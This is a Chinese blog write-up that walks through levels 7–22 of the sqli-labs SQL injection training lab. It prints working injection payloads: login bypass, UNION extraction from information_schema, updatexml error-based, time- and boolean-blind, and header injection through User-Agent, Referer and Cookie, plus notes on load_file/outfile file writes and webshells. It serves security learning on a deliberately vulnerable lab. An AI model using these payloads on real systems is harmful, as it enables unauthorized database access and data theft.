Sqli-libs(Less7~Less23)通关详解,通篇大白话,看完不懂直接v你50吃KFC

已于 2022-10-18 21:41:35 修改
阅读量1.1k 收藏 1
点赞数 1
文章标签: 数据库 mysql 安全 web安全 网络安全
于 2022-10-18 21:21:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/henghengzhao_/article/details/127396977
版权

大白话讲解,通篇写的是我做题的一个思路,建议先了解一下sql注入的基本原理再来看,主要针对人群,sql注入初学者,来刷sqli-libs靶场但是感觉吃力的。看完要还是不会,来来来,评论区留言,我v你50吃个KFC

目录

 

Less7

Less9

Less10

Less11

Less12

Less13

Less14

Less15

Less16

Less17

Less18

Less19

Less20

Less21

Less22

总结:

 

Less7

  • 关键词:get方法,转储到输出文件,字符型

  • 好家伙,终于碰见知识盲区了,我们先补充一波知识点再开始上代码(后来想起来之前学过这一块,sql注入文件读写,额,真是健忘啊我)

?id=1'))--+
#新奇操作,这个闭合方式竟然是')),第一次知道这种方式
?id=-1')) or updatexml(1,concat(0x7e,database(),0x7e),1)--+ 
#联合查询不行,报错注入不行
?id=1')) and length(database())>100--+ 
#布尔盲注貌似可以,但是我真的不想用布尔盲注,太慢了
#按照提示,文件读写吧

文件读取知识点补充:

文件读取基本条件:

  1. 当前用户权限对该文件可读。

  2. 文件在该服务器上。

  3. 路径完整。

  4. 文件大小小于max_sllowed_packet。

  5. 当前数据库用户有FILE权限,File_priv为yes

  6. secure_file_priv的值为空,如果值为某目录,那么就只能对该目录的文件进行操作

select File_priv from mysql.user where user='root' and host='localhost'
#实战中我们就可以根据这里来判断是否我们有读写权限
show variables like 'max_allowed_packet'
#查看可读写文件大小,My.ini配置文件中本没有max_allowed_packet这一项,可以通过添加来修改可读写文件大小

My.ini配置文件中也没有secure_file_priv这一项,默认为不允许读写磁盘中任何未知的文件,也就是说默认值为NULL。这里的null不是空

关于/和\,读文件时只能用/,写文件时两者都可以

  • 读文件:select load_file("D:\123.txt")

  • 写文件:select "test" into outfile "D:\234.txt"

当我们知道了如何读写,接下来难点就是如何判断文件路径了

 

  • 这一关实在是不会了,因为不知道网站绝对路径,即使写了木马上去,蚁剑也连接不了,因为没有url,正常思路就是写文件,写一句话木马,然后蚁剑连接

 

 

Less9

  • 关键词:单引号,时间盲注

  • sleep()

?id=1'
#一开始试了好多遍,单引号,双引号,什么都没有反应,太离谱了,根本无法判断注入类型,也就是说没有报错,这样的话只有采取时间盲注了
?id=1' and sleep(3)--+
#我们通过这个来判断闭合形式,如果不正确的话是不会执行sleep(3)的,因为报错了,但是闭合形式猜对了就会三秒后响应
id=1' and if(length(database())=8,sleep(3),1)--+
#这句话的意思是去猜解数据库名称长度,如果为8,休眠三秒,否则执行1
#接下来的步骤就有点像布尔盲注了,太繁琐就不写了,需要去爆破

 

 

Less10

  • 关键词:时间盲注,双引号

  • 不写了,参考Less9

 

 

Less11

  • 关键词:POST方法,报错注入,单引号,字符型

  • 这一关终于看到点不一样的了,进去是个输入账号密码的框,有点意思

  • 直接上代码

#输入单引号报错,说明闭合形式是单引号
admin'or(true)#
#直接上万能账号密码,登录成功,存在sql注入
admin' order by 2#
#存在两列
-admin' union select 1,2#
#回显位,1,2
-admin' union select database(),2#
#数据库名security
-admin' union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),2#
#接下来没啥说的了,老套路

  • 时间盲注也可以实现

1' or sleep(3)#
#这次要用or,因为 前面的账号并不是1,我们还原以下sql语句
select username,password from user where username='1' or sleep(3)#and ......
#我们发现 username='1'是false,那么后面如果是and的话,就没执行后面的就结束了,所以要用or

  • 报错注入

-1' or updatexml(1,concat(0x7e,database(),0x7e),1)#

 

 

Less12

  • 关键词:基于错误的双引号POST型字符型变形的注入

  • 和11题一样,只是把单引号变双引号加括号

 

 

Less13

  • 关键词:POST单引号变形双注入

  • 测试的时候出现语法报错,说明是可以报错注入的

  • 闭合方式是单引号加括号

  • 试了-1') or sleep(3)#,发现可以时间盲注

#试了很多,发现无回显,就用报错注入吧
-1') or updatexml(1,concat(0x7e,database(),0x7e),1)#
#数据库名security
#下面不解释了,翻往期

  • 时间盲注

-1') or if(length(database())=8,sleep(3),1)#

 

 

Less14

  • 关键词:和上个一样,奇怪

  • 最终发现就是把单引号变成双引号了

  • 具体没啥可说的,和Less13一样

 

 

Less15

  • 关键词:POST 布尔盲注或时间盲注 单引号

  • 测试后发现,没有回显,确实是单引号闭合

  • 时间盲注

-1' or sleep(3)#

  • 布尔盲注

-1' or length(database())=8#
#上面说的无回显是有点片面了,其实有办法判断是否登录成功,只是没有回显位而已

 

 

Less16

  • 和15题一样,把单引号改为双引号加括号

 

 

Less17

  • 关键词:报错注入,更新查询,POST

  • 终于遇到新的东西了,更新注入,哈哈哈,我们先回忆一下sql语句吧

    • update table_name set value1=new_value1,value2=new_value2 where value={value};

       

  • 更新当然是在新的数据那里注入咯

  • 更新,删除,增加等语句一般都没有什么回显,无回显就选择报错注入或者时间盲注,当然,大家都知道,我不喜欢时间盲注,爆破太慢了,但是我们还是先测测吧,看看存在不存在时间盲注

password:123' and sleep(3)#
#可以时间盲注

  • md,试了很多次,发现有个前提,就是必须是我的用户名要输入正确,不然注入没法进行,而且那个用户那里还没有注入点,服了,这玩个鬼

  • 不过还好,我知道账号有个admin,哈哈哈哈哈,那就接着玩呗

  • 报错注入

username:admin
password:123'
#报错,说是多了个单引号,那肯定存在报错注入咯
#接下来懒得去写
1' and updatexml(1,concat(0x7e,database(),0x7e),1)#
#必须用and,用or,后面就不执行了可能

 

 

Less18

  • 关键词:User Agent注入,请求头,post

  • 新东西哈哈哈,不过之前遇到过user agent写一句话木马的题

  • 整半天也不知道怎么玩的,百度了一下,原来要先登录才有得玩,无语.....

  • 登录半天也没有登录上去,我寻思着账号密码就是admin啊

  • 百思不得其解,最后恍然大悟,我17关的时候把密码改了,,,焯!

  • 回去又改回来了,然后终于登录上了

  • 登上之后显示了User Agent的信息

  • 关于什么是User Agent???这个是http协议的请求头里面的东西,具体内容就是关于你自己浏览器的信息,请求服务器的时候会自动带上,然后保存到服务器去了

  • 好家伙,既然它有回显,那我们就可以试试去注入它呗

  • 具体怎么注入,之前也说了,这玩意肯定是保存到服务器的,那么数据库自然会用insert语句去增加它

    • 知识补充

      insert into table_name (column1,column2) values (value1,value2)

       

  • 报错注入

#增加当然要报错注入咯
#我们构造语句,注入点在value1那块,闭合两边的单引号
xxxx' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

  • 配合burp抓包,修改信息,直接注入

  • 接下来具体就不多说咯,注入点找到了下来还不简单嘛

 

 

Less19

  • 关键词:和上一关一样,除了User Agent换成了Referer

  • 同理:Referer也是http请求头里面的信息,用来发送uri(请求资源路径)的,其实就是告诉服务器,这个请求是从哪个页面发出的,但是有时候也可以不带referer信息,比如有的请求带有敏感信息,get请求带参数等

  • 注入和上一关一样,burp抓包,改信息,报错注入

 

 

Less20

  • 关键词:这次变成cookie了

  • 老子找了半天也没有找到cookie,,,,无语,登录了啊

  • I LOVE YOU COOKIES

  • 这是什么意思??

  • 后来终于明白什么意思了这道题

  • 其实就是当你登录了之后,需要再访问一次这个页面,只不过这次你要带着cookie去访问

  • 怎么带着呢,burp抓包,写进去(无语了,这个题还得自己去操作)

  • 加这么一条信息:Cookie: uname=admin

  • 然后放包,信息就在页面上访问出来了

  • 接下来正常注入即可,cookie,想怎么操作怎么操作吧,这个是查询语句。。。。。

select useragent,cookie......   from xxx where uname={cookie.uname}

  • 闭合方式,单引号

 

Less21

  • 和上一关一样,只不过是cookie做了个base64加密,把admin加密即可

  • 闭合方式单引号加括号

 

 

Less22

  • 和上一关一样,只不过是双引号闭合

 

 

 

总结:

sqlilibs第一阶段刷完咯,感觉没啥新意,都是老套的,特别还是大部分题都是重复的,改个闭合方式而已,不过中规中矩,这个平台真的不错,对新手特别友好,推荐!!!

建议刷sqlilibs的时候,多多思考,用会的知识去解决不会的问题,真的不会就去百度,不要浪费时间,因为可能是你的知识盲点

到后面可以一道题多种思路去解决,不要局限思维,活学活用嘛

 

 

 

 

henghengzhao_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sql-labs靶场第23-53新手通关学习详解
m0_70483044的博客
11-10 1217
sql-labs 23-53新手教程~很早之前的文章忘记发了!!!有错误的地方欢迎指正!菜鸟选手。
Sqli-labs通关攻略(持续更新ing
qq_50808416的博客
05-11 1423
sqli-labs详细攻略
sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置
最新发布
Superstacks超全栈
06-09 369
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
Sqlibs-Less46-53-order by注入
Xor0ne
07-14 413
46.less46-ORDER BY-Error-Numeric 46.1、注入分析 从本关开始,我们开始学习order by 相关注入的知识。 本关的sql语句为 sql="SELECT ∗ FROM users ORDER BY id"; 尝试?sort=1 desc或者asc,显示结果不同,则表明可以注入。(升序or降序排列) 从上述的sql语句中我们可以看出,我们的注入点在order by后面的参数中,而order by不同于的我们在where后的注入点,不能使用union等进行注入。如何进行o
sqli_libs通关教程
qq_48904485的博客
03-22 5287
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
SQL-LIBS 41-50通关过程
weixin_51387754的博客
10-20 461
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqlilabs.zip
07-19
sqlilabs 默认只能支持php5,如果安装环境为php7的话,会导致数据库无法自动安装,此版本为php7下的版本,可以直接安装,如果有安装过程有什么问题可以留言。
sql tuning:select锁insert
ibsfn
10-08 236
并发高时,出现锁等待: ---------------------------- *************************** 1. row *************************** waiting_trx_id: 14537594 waiting_thread: 11373 INSERT into sch_work_time_temp(sch_work_time_i
sqli-labs大详解结)
热门推荐
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
sqli-libs闯关
weixin_43411799的博客
09-07 752
sqli-labs闯关less-1 文章目录sqli-labs闯关less-1sqli-libs简介 sqli-libs简介 sqli-lib是一个印度程序员写的,是用来学习SQL注入的闯关游戏,在本地搭建apache+mysql+php环境即可 ##系统函数 version() mysqls数据库版本 user() 数据库用户名 database()数据库名 @@datadir()数据库路径 @@version__compile_os操作系统版本 ##less-1 ####找注入点 我们可以在 ht
sqli-libs系列
qq_43511094的博客
12-31 1544
sqllibs information_schema中的表实际上是视图,而不是基本表,因此,文件系统上没有与之相关的文件 information_schema库中常用的表 schemate 这个表就很强,可以显示所有数据库的信息,注意,是数据库,不是表,show databases 就是从这个表中获取数据,schema_name就
LESS-7
qq_44598397的博客
03-19 280
LESS-7源码: 注意在要对文件进行导入导出首先得要有足够的权限, 但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null) secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 1、当secure_file_priv的值为null ,表示限制mys...
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1139
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入的基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

henghengzhao_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值